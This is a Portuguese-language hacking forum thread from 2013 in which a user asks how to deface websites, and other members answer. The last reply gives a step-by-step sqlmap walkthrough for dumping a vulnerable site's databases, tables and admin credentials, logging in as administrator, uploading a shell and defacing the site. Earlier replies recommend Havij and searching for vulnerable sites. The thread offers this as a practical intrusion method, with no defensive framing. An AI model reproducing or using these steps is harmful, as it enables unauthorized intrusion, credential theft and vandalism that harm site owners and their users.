Unconfigured Ad Widget

**g4bri3l** · 01-05-2013, 20:36

Olá amigo,
da uma olhada no fórum, que tem uma pah de tutorial.

**AnonRyu** · 08-05-2013, 23:56

Quer aprender a fazer Deface, a meneira mais fácil é por meio desse canal do youtube:

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

Boa sorte!

**Linkeds** · 11-05-2013, 17:08

e simples

primeiramente você precisa saber sobre sql injection ! e melhor e pois isso se vai se aprimorando e aprocura de sites vuneraveis você pode fazer sua invasão e sua defacer

**AlJoker** · 11-05-2013, 18:08

Postado Originalmente por weberth41 Ver Post

Olá Membros e Moderadores,
Eu queria saber como fazer um Deface,
a inda não achei um Tutorial que ensinasse como fazer, tenho conhecimento em SQL, já vi algum Tutoriais com Havij, mais queria um Programa ou um método que der certo.
Obrigado, se algum souber um link aqui do Fórum ou de outro site min mande por MP ou poste nos comentários.

se tivese conhecimento em SQL ia sabe que havij funciona mais e presisor acho um site vulnneral, se for usar ferrementas usa SQL map

**kgbvalhalla** · 13-05-2013, 23:13

Uma maneira simples,é por SQL Injection,consigo a senha de adm,entre,upe sua shell,e pronto...
Use o SQLMAP, é uma ferramente em Python, roda tanto no Linux quando no WIndows, aqui dexo um breve tutorial do SQLMAP saco voce nao saiba:
NO linux é o seguinte, entre na pasta onde está o SQLMAP pelo terminal e entao ecreva o seguinte...

./sqlmap.py -u LINK DO SITE --dbs
Após isso vai aparecer as seguintes databases
+---------------------------------------+
| information_schema |
| NOME DA DB DO SITE |
+--------------------------------------+

Entao faça isso,

./sqlmap.py -u LINK DO SITE -D NOME DA DB DO SITE --tables

vai aparecer as tabelas daquela db por exemplo
noticias
imagens
blablabla
admin
users
etc...etc...

provavelmente o login ea senha estarao ou na tabela USERS ou ADMIN
entao tenta uma delas,mas provavelmente terá apenas uma delas,
entao faça isso

./sqlmap.py -u LINK DO SITE -D NOME DA DB -T ADMIN --columns

com isso vai aparecer algumas informaçoes dentre elas 2 importantes,
login
senha
faça isso para conseguir os dados

./sqlmap -u LINK DO SITE -D NOME DA DB -C login --dump

faça isso só q trocando o "login" por "senha" e voce tera os dados para entrar na pagina de adm do site,

caso nao saiba tb como achar a pagina de admin,dexo o link aqui de um script em perl para de ajudar,ou tente pelo robots.txt

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

basicamente é isso...ATÉ.

Download:Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

Unconfigured Ad Widget

Anúncio

[Duvida] Deface/Como fazer.

[Duvida] Deface/Como fazer.

Comment

Comment

Comment

Comment

Comment